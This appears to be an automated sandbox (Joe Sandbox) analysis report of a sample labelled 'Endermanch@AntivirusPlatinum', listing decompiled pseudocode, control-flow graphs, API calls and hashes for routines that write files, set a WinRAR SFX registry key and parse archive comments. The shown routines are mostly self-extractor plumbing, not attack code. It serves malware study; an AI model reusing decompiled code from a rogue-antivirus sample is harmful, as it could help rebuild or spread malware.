                                                                                                                                                      control_flow_graph 1437 405585-405590 1438 405685-405687 1437->1438 1439 405596-40559b 1437->1439 1440 4055b2-4055b9 1439->1440 1441 40559d-40559e 1439->1441 1444 4055ba-4055c2 1440->1444 1442 4055a0-4055a1 1441->1442 1443 4055a7 1441->1443 1442->1440 1445 4055a3-4055a5 1442->1445 1446 4055a9-4055af GetStdHandle 1443->1446 1447 405601-405616 WriteFile 1444->1447 1448 4055c4-4055c7 1444->1448 1445->1446 1446->1440 1449 405618-40561a 1447->1449 1450 4055c9-4055d5 1448->1450 1451 40561c-405620 1448->1451 1449->1451 1452 40567f-405684 1449->1452 1454 4055d7 1450->1454 1455 4055d9-4055f2 WriteFile 1450->1455 1451->1452 1453 405622-405626 1451->1453 1452->1438 1453->1452 1456 405628-40563c call 403304 1453->1456 1454->1455 1455->1451 1457 4055f4-4055fd 1455->1457 1461 405672-40567a call 403471 1456->1461 1462 40563e-405644 1456->1462 1457->1450 1459 4055ff 1457->1459 1459->1449 1461->1452 1462->1444 1463 40564a-40564c 1462->1463 1463->1444 1465 405652-40566d call 404fdc call 4054ed 1463->1465 1465->1444
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E00405585(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				int _t26;
                                                                                                                                                      				long _t32;
                                                                                                                                                      				int _t35;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				long _t48;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				struct _OVERLAPPED* _t55;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      
                                                                                                                                                      				_t53 = __edx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t60 = __ecx;
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					L25:
                                                                                                                                                      					return _t24;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 =  *(__ecx + 0xc);
                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                      					L7:
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t55 = 0;
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 <= 0) {
                                                                                                                                                      							L17:
                                                                                                                                                      							if( *((char*)(_t60 + 0x14)) == 0 ||  *((intOrPtr*)(_t60 + 0xc)) != 0) {
                                                                                                                                                      								L24:
                                                                                                                                                      								 *((char*)(_t60 + 8)) = 1;
                                                                                                                                                      								goto L25;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_t18 = _t60 + 0x17; // 0x17
                                                                                                                                                      								if(E00403304(0x414c7c, _t18) == 0) {
                                                                                                                                                      									_t22 = _t60 + 0x17; // 0x17
                                                                                                                                                      									_t24 = E00403471(0x414c7c, 0, _t22);
                                                                                                                                                      									goto L24;
                                                                                                                                                      								}
                                                                                                                                                      								_t19 =  &_v8; // 0x9454529
                                                                                                                                                      								_t24 =  *_t19;
                                                                                                                                                      								if(_t24 < _a8 && _t24 > 0) {
                                                                                                                                                      									_t38 = E00404FDC(_t60, _t53);
                                                                                                                                                      									_t21 =  &_v8; // 0x9454529
                                                                                                                                                      									asm("sbb edx, edi");
                                                                                                                                                      									_t24 = E004054ED(_t60, _t38 -  *_t21, _t53, 0);
                                                                                                                                                      								}
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L10:
                                                                                                                                                      							_t48 = _a8 - _t55;
                                                                                                                                                      							_t32 = 0x4000;
                                                                                                                                                      							if(_t48 < 0x4000) {
                                                                                                                                                      								_t32 = _t48;
                                                                                                                                                      							}
                                                                                                                                                      							_t8 =  &_v8; // 0x9454529
                                                                                                                                                      							_t35 = WriteFile( *(_t60 + 4), _a4 + _t55, _t32, _t8, 0);
                                                                                                                                                      							asm("sbb al, al");
                                                                                                                                                      							_t24 =  ~(_t35 - 1) + 1;
                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                      								goto L17;
                                                                                                                                                      							}
                                                                                                                                                      							_t55 = _t55 + 0x4000;
                                                                                                                                                      							if(_t55 < _a8) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							L16:
                                                                                                                                                      							if(_t24 != 0) {
                                                                                                                                                      								goto L24;
                                                                                                                                                      							}
                                                                                                                                                      							goto L17;
                                                                                                                                                      						}
                                                                                                                                                      						goto L17;
                                                                                                                                                      						L15:
                                                                                                                                                      						_t12 =  &_v8; // 0x9454529
                                                                                                                                                      						_t26 = WriteFile( *(_t60 + 4), _a4, _a8, _t12, 0); // executed
                                                                                                                                                      						asm("sbb al, al");
                                                                                                                                                      						_t24 =  ~(_t26 - 1) + 1;
                                                                                                                                                      						goto L16;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t40 = _t24 - 1;
                                                                                                                                                      				if(_t40 == 0) {
                                                                                                                                                      					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                      					L6:
                                                                                                                                                      					 *(_t60 + 4) = _t24;
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 = _t40 - 1;
                                                                                                                                                      				if(_t24 != 0) {
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 = GetStdHandle(0xfffffff4);
                                                                                                                                                      				goto L6;
                                                                                                                                                      			}














                                                                                                                                                      0x00405585
                                                                                                                                                      0x00405588
                                                                                                                                                      0x0040558e
                                                                                                                                                      0x00405590
                                                                                                                                                      0x00405685
                                                                                                                                                      0x00405687
                                                                                                                                                      0x00405687
                                                                                                                                                      0x00405596
                                                                                                                                                      0x0040559b
                                                                                                                                                      0x004055b2
                                                                                                                                                      0x004055ba
                                                                                                                                                      0x004055ba
                                                                                                                                                      0x004055bc
                                                                                                                                                      0x004055c2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055c7
                                                                                                                                                      0x0040561c
                                                                                                                                                      0x00405620
                                                                                                                                                      0x0040567f
                                                                                                                                                      0x00405680
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405628
                                                                                                                                                      0x00405628
                                                                                                                                                      0x0040562a
                                                                                                                                                      0x0040563c
                                                                                                                                                      0x00405672
                                                                                                                                                      0x0040567a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040567a
                                                                                                                                                      0x0040563e
                                                                                                                                                      0x0040563e
                                                                                                                                                      0x00405644
                                                                                                                                                      0x00405656
                                                                                                                                                      0x0040565b
                                                                                                                                                      0x00405662
                                                                                                                                                      0x00405668
                                                                                                                                                      0x00405668
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405644
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055c9
                                                                                                                                                      0x004055c9
                                                                                                                                                      0x004055cc
                                                                                                                                                      0x004055ce
                                                                                                                                                      0x004055d5
                                                                                                                                                      0x004055d7
                                                                                                                                                      0x004055d7
                                                                                                                                                      0x004055db
                                                                                                                                                      0x004055e9
                                                                                                                                                      0x004055ee
                                                                                                                                                      0x004055f0
                                                                                                                                                      0x004055f2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055f4
                                                                                                                                                      0x004055fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405618
                                                                                                                                                      0x0040561a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040561a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405601
                                                                                                                                                      0x00405602
                                                                                                                                                      0x0040560f
                                                                                                                                                      0x00405614
                                                                                                                                                      0x00405616
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405616
                                                                                                                                                      0x004055ba
                                                                                                                                                      0x0040559d
                                                                                                                                                      0x0040559e
                                                                                                                                                      0x004055a9
                                                                                                                                                      0x004055a9
                                                                                                                                                      0x004055af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055af
                                                                                                                                                      0x004055a0
                                                                                                                                                      0x004055a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055a9
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00409250,?,?,00000000,?,?,0040EA1F,?,?,09454529,?,?), ref: 004055A9
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00004000,)EE*)))*))),00000000,00000000,?,00000000,00000017,00000000,?,00409250,?,?,00000000,?), ref: 004055E9
                                                                                                                                                      • WriteFile.KERNELBASE(?,?,00000000,)EE*)))*))),00000000,?,?,?,00000000,?,00409250,?,?,00000000,?,?), ref: 0040560F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite$Handle
                                                                                                                                                      • String ID: )EE*)))*)))$|LA
                                                                                                                                                      • API String ID: 4209713984-4270601557
                                                                                                                                                      • Opcode ID: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                      • Instruction ID: 699b0b7827fd0117c3666501287c6da654fc132a3aa7f220188452afde949247
                                                                                                                                                      • Opcode Fuzzy Hash: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                      • Instruction Fuzzy Hash: 9331A371600908BBEF20DA25CD44FBF77AAEB90710F14852BA51AE62D0CB39A901CF19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1470 40b92f-40b941 1471 40b943-40b949 1470->1471 1472 40b9ab-40b9ad 1470->1472 1471->1472 1473 40b94b-40b980 call 40b901 RegCreateKeyExA 1471->1473 1473->1472 1476 40b982-40b9a5 call 40a384 RegSetValueExA RegCloseKey 1473->1476 1476->1472
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B92F(void* __esi, char* _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				char _v1036;
                                                                                                                                                      				long _t9;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                      
                                                                                                                                                      				_t23 =  *0x419f90; // 0x1
                                                                                                                                                      				if(_t23 != 0) {
                                                                                                                                                      					_t24 =  *0x418ed0; // 0x43
                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                      						E0040B901( &_v1036, "C:\WINDOWS");
                                                                                                                                                      						_t9 = RegCreateKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12); // executed
                                                                                                                                                      						if(_t9 == 0) {
                                                                                                                                                      							RegSetValueExA(_v8,  &_v1036, 0, 1, _a4, E0040A384(_t19, _a4) + 1); // executed
                                                                                                                                                      							return RegCloseKey(_v8);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t9;
                                                                                                                                                      			}










                                                                                                                                                      0x0040b93b
                                                                                                                                                      0x0040b941
                                                                                                                                                      0x0040b943
                                                                                                                                                      0x0040b949
                                                                                                                                                      0x0040b957
                                                                                                                                                      0x0040b977
                                                                                                                                                      0x0040b980
                                                                                                                                                      0x0040b99c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b9a5
                                                                                                                                                      0x0040b980
                                                                                                                                                      0x0040b949
                                                                                                                                                      0x0040b9ad

                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\WINDOWS,?,00000000), ref: 0040B977
                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000001,?), ref: 0040B99C
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040B9A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                      • String ID: C:\WINDOWS$Software\WinRAR SFX
                                                                                                                                                      • API String ID: 1818849710-3781130125
                                                                                                                                                      • Opcode ID: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                      • Instruction ID: c16daf66e710161b54d0a2fba0aebfabfb44711b4487a502893ad39a1af73d28
                                                                                                                                                      • Opcode Fuzzy Hash: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                      • Instruction Fuzzy Hash: DD016DB1400218BEEB21DB90DD81EEB7F2DEB04388F004176BB01F10A1D7B55E55D6AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1479 409293-4092a6 call 401200 1482 4092ad-4092b5 1479->1482 1483 4092a8 call 40a3ad 1479->1483 1484 4092b7-4092d5 GetModuleFileNameA call 40a3d9 1482->1484 1485 4092dc-40930b call 40a477 call 404ec3 call 405097 1482->1485 1483->1482 1491 4094ca-4094cc 1484->1491 1492 4092db 1484->1492 1496 40931d-409324 1485->1496 1497 40930d-409318 call 405074 1485->1497 1492->1485 1499 409325-409329 1496->1499 1504 4094c9 1497->1504 1501 409401-40942e call 4054ed call 40a1ec 1499->1501 1502 40932f-40934f call 404fdc call 40568a 1499->1502 1512 409434-409451 call 40568a 1501->1512 1513 4094bd-4094c8 call 405074 1501->1513 1511 409354-40935a 1502->1511 1504->1491 1511->1513 1514 409360 1511->1514 1525 409453-40945c 1512->1525 1526 4094b4-4094ba 1512->1526 1513->1504 1517 409362-40936c 1514->1517 1520 409390-409393 1517->1520 1521 40936e-409376 1517->1521 1523 409395-40939d 1520->1523 1524 4093bb-4093c4 1520->1524 1521->1520 1522 409378-40938e call 40a53d 1521->1522 1522->1520 1536 4093c8-4093cd 1522->1536 1523->1524 1528 40939f-4093b5 call 40a53d 1523->1528 1524->1517 1530 4093c6 1524->1530 1525->1526 1529 40945e-409461 1525->1529 1526->1513 1528->1513 1528->1524 1533 409463-40946a 1529->1533 1534 40949e-4094a1 1529->1534 1535 4093d0-4093f1 call 4054ed 1530->1535 1540 409497 1533->1540 1541 40946c-40946f 1533->1541 1537 4094a3-4094a6 1534->1537 1538 4094a8-4094aa 1534->1538 1535->1499 1551 4093f7-4093fb 1535->1551 1536->1535 1537->1538 1544 4094ab 1537->1544 1538->1544 1543 40949b-40949c 1540->1543 1545 409491-409495 1541->1545 1546 409471-409474 1541->1546 1548 4094ae-4094b2 1543->1548 1544->1548 1545->1543 1549 409476-409479 1546->1549 1550 40948b-40948f 1546->1550 1548->1525 1548->1526 1552 409485-409489 1549->1552 1553 40947b-40947d 1549->1553 1550->1543 1551->1501 1551->1513 1552->1543 1553->1544 1554 40947f-409483 1553->1554 1554->1543
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00409293(char __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v1040;
                                                                                                                                                      				char _v4144;
                                                                                                                                                      				char _v12336;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				char _t95;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t111;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t117;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				void* _t119;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t110 = __edx;
                                                                                                                                                      				_t97 = __ecx;
                                                                                                                                                      				_t95 = __ebx;
                                                                                                                                                      				E00401200(0x302c);
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				_t125 = __ecx;
                                                                                                                                                      				_t65 = E0040A3AD();
                                                                                                                                                      				_t66 =  &_v1040;
                                                                                                                                                      				if(_t65 != 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					E0040A477(_t66, _a4);
                                                                                                                                                      					E00404EC3( &_v4144);
                                                                                                                                                      					_t70 = E00405097( &_v4144,  &_v1040, 0, 1, 0); // executed
                                                                                                                                                      					if(_t70 != 0) {
                                                                                                                                                      						_a4 = _a4 | 0xffffffff;
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						_push(_t95);
                                                                                                                                                      						L7:
                                                                                                                                                      						while(_a4 == 0xffffffff) {
                                                                                                                                                      							_t80 = E00404FDC( &_v4144, _t110); // executed
                                                                                                                                                      							_v12 = _t80;
                                                                                                                                                      							_t82 = E0040568A( &_v4144, _t110,  &_v12336, 0x2000); // executed
                                                                                                                                                      							_v16 = _t82;
                                                                                                                                                      							if(_t82 >= 0x10) {
                                                                                                                                                      								_t122 = 0;
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                      									if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                      										_t122 = _t122 + 1;
                                                                                                                                                      										if(_t122 <= _v16 + 0xfffffff0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											L19:
                                                                                                                                                      											E004054ED( &_v4144, _v16 + _v12 - 0x10, 0, 0);
                                                                                                                                                      											_v8 = _v8 + 1;
                                                                                                                                                      											if(_v8 < 0x40) {
                                                                                                                                                      												goto L7;
                                                                                                                                                      											} else {
                                                                                                                                                      												if(_a4 != 0xffffffff) {
                                                                                                                                                      													goto L21;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L42;
                                                                                                                                                      								}
                                                                                                                                                      								_a4 = _t122 + _v12;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							L42:
                                                                                                                                                      							_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                      							goto L43;
                                                                                                                                                      						}
                                                                                                                                                      						L21:
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_t95 = 0;
                                                                                                                                                      						 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                      						E004054ED( &_v4144, _a4, _t110, 0);
                                                                                                                                                      						_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                      						 *_t125 = _t75;
                                                                                                                                                      						if(_t75 != 0) {
                                                                                                                                                      							 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                      							_t77 = E0040568A( &_v4144, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                      							_t104 = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                      							if(_t77 > 0) {
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t79 =  *_t125;
                                                                                                                                                      									_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                      									_t95 = _t95 + 1;
                                                                                                                                                      									if(_t111 == 0) {
                                                                                                                                                      										goto L41;
                                                                                                                                                      									}
                                                                                                                                                      									if(_t111 != 0x5c) {
                                                                                                                                                      										if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                      											_t111 = 0xc;
                                                                                                                                                      										}
                                                                                                                                                      										goto L39;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                      										if(_t116 == 0) {
                                                                                                                                                      											 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                      											goto L35;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t117 = _t116 - 0x3a;
                                                                                                                                                      											if(_t117 == 0) {
                                                                                                                                                      												 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                      												goto L35;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t118 = _t117 - 0x12;
                                                                                                                                                      												if(_t118 == 0) {
                                                                                                                                                      													 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                      													goto L35;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t119 = _t118 - 4;
                                                                                                                                                      													if(_t119 == 0) {
                                                                                                                                                      														 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                      														goto L35;
                                                                                                                                                      													} else {
                                                                                                                                                      														if(_t119 != 0) {
                                                                                                                                                      															L39:
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                      														} else {
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                      															L35:
                                                                                                                                                      															_t95 = _t95 + 1;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									_t104 = _t104 + 1;
                                                                                                                                                      									if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							L41:
                                                                                                                                                      							 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                      						}
                                                                                                                                                      						goto L42;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                      					}
                                                                                                                                                      					L43:
                                                                                                                                                      				} else {
                                                                                                                                                      					GetModuleFileNameA(0,  &_v1040, 0x400);
                                                                                                                                                      					_t76 = E0040A3D9(_t97,  &_v1040, 0x5c);
                                                                                                                                                      					if(_t76 != 0) {
                                                                                                                                                      						_t66 = _t76 + 1;
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t76;
                                                                                                                                                      			}




























                                                                                                                                                      0x00409293
                                                                                                                                                      0x00409293
                                                                                                                                                      0x00409293
                                                                                                                                                      0x0040929b
                                                                                                                                                      0x0040929f
                                                                                                                                                      0x004092a3
                                                                                                                                                      0x004092a6
                                                                                                                                                      0x004092a8
                                                                                                                                                      0x004092af
                                                                                                                                                      0x004092b5
                                                                                                                                                      0x004092dc
                                                                                                                                                      0x004092e0
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x00409304
                                                                                                                                                      0x0040930b
                                                                                                                                                      0x0040931d
                                                                                                                                                      0x00409321
                                                                                                                                                      0x00409324
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409325
                                                                                                                                                      0x00409335
                                                                                                                                                      0x0040933a
                                                                                                                                                      0x0040934f
                                                                                                                                                      0x00409354
                                                                                                                                                      0x0040935a
                                                                                                                                                      0x00409360
                                                                                                                                                      0x00409362
                                                                                                                                                      0x00409362
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409393
                                                                                                                                                      0x004093be
                                                                                                                                                      0x004093c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093c6
                                                                                                                                                      0x004093d0
                                                                                                                                                      0x004093e5
                                                                                                                                                      0x004093ea
                                                                                                                                                      0x004093f1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093f7
                                                                                                                                                      0x004093fb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093fb
                                                                                                                                                      0x004093f1
                                                                                                                                                      0x004093c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409393
                                                                                                                                                      0x004093cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093cd
                                                                                                                                                      0x004094bd
                                                                                                                                                      0x004094c3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094c8
                                                                                                                                                      0x00409401
                                                                                                                                                      0x00409404
                                                                                                                                                      0x00409405
                                                                                                                                                      0x00409410
                                                                                                                                                      0x00409417
                                                                                                                                                      0x00409425
                                                                                                                                                      0x0040942a
                                                                                                                                                      0x0040942e
                                                                                                                                                      0x00409437
                                                                                                                                                      0x00409445
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944e
                                                                                                                                                      0x00409451
                                                                                                                                                      0x00409453
                                                                                                                                                      0x00409453
                                                                                                                                                      0x00409455
                                                                                                                                                      0x00409459
                                                                                                                                                      0x0040945c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409461
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409463
                                                                                                                                                      0x00409467
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x00409497
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040946c
                                                                                                                                                      0x0040946c
                                                                                                                                                      0x0040946f
                                                                                                                                                      0x00409491
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409471
                                                                                                                                                      0x00409471
                                                                                                                                                      0x00409474
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409476
                                                                                                                                                      0x00409476
                                                                                                                                                      0x00409479
                                                                                                                                                      0x00409485
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040947b
                                                                                                                                                      0x0040947d
                                                                                                                                                      0x004094ab
                                                                                                                                                      0x004094ab
                                                                                                                                                      0x0040947f
                                                                                                                                                      0x0040947f
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040947d
                                                                                                                                                      0x00409479
                                                                                                                                                      0x00409474
                                                                                                                                                      0x0040946f
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x004094ae
                                                                                                                                                      0x004094b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b2
                                                                                                                                                      0x00409453
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094ba
                                                                                                                                                      0x004094ba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040930d
                                                                                                                                                      0x00409313
                                                                                                                                                      0x00409313
                                                                                                                                                      0x004094c9
                                                                                                                                                      0x004092b7
                                                                                                                                                      0x004092bf
                                                                                                                                                      0x004092ce
                                                                                                                                                      0x004092d5
                                                                                                                                                      0x004092db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092db
                                                                                                                                                      0x004092d5
